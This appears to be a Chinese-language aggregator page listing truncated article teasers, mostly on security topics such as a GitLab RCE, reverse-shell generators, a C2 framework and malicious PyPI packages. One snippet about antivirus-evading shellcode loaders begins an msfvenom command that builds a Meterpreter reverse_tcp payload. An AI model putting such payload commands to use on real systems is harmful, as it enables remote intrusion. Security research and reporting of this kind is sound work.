来自公众号:Python大数据分析大家都知道Python,但是应该很少有人听过dython,dython是python中的一款数据建模库。尽管已经有了scikit-learn、statsmodels、...
【技术干货】CVE-2021-22205 GITLAB 未授权 RCE 漏洞
arp @PortalLab实验室漏洞描述GitLab是一款Ruby开发的Git项目管理平台。如11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-2220...
如何使用LAZYPARIAH实时生成反向Shell Payload
关于LAZYPARIAH LAZYPARIAH是一款功能强大的命令行工具,该工具依赖的组件并不多,但是却可以帮助广大研究人员在渗透测试过程中利用命令行接口实时生成反向Shell ...
渗透测试常用武器分享 第二期(泄露扫描)
本期是针对渗透中的网站泄露扫描。泄露扫描分为针对网站的泄露扫描、针对第三方平台的泄露扫描。Packer Fuzzer开源 | 信息收集 | Python | 1.3k Star简介: 一款针...
POC bomber - 用于渗透和红队快速打点的漏洞检测工具
非常不错的一个项目,有喜欢的可以给点个星Star,https://github.com/tr0uble-mAker/POC-bomberPOC bomber是一款漏洞检测工具,旨在利用大量高危害漏洞的...
Python编写loader加载shellcode免杀学习
(1)msf生成shellcode,使用base64编码。msfvenom -p windows/x64/meterpreter/reverse_tcp --encrypt base64 lhost=...
攻击技术研判 |利用开源软件包安装程序Chocolately落地的新型后门
情报背景Proofpoint团队近日发现了一种利用合法开源软件包安装程序Chocolatey来实现后门的独特攻击,后门被命名为Serpent。在本次事件中,攻击者利用合法的Python代码实现通信以绕...
神兵利器 - C2 框架
文章来源 :Khan安全攻防实验室 PoshC2 主要是用 Python3 编写的,遵循模块化格式,使用户...
Gitee pages自动部署
一、前期准备1.1 安装环境 1、安装python3 2、打开命令行安装selenium 1pip install selenium 二、python代码2.1 源码12345678910111213...
【风险通告】NotLegit:Microsoft Azure泄露近4年所有源代码
0x00 风险概述2021年12月21日,Wiz 研究团队公开了在Microsoft Azure应用服务中发现的一个至少存在4年的信息泄露漏洞(称为“NotLegit”),该漏洞暴露了使用本地Git部...
Python人工智能 | 十一.Tensorflow如何保存神经网络参数
恶意mitmproxy2 Python包被移除
PyPI近日移除了恶意mitmproxy2 Python包。mitmproxy2官方mitmproxy Python库是一个免费、开源的交互式HTTPS代理,每周下载量超过4万次。10月11日,mit...
91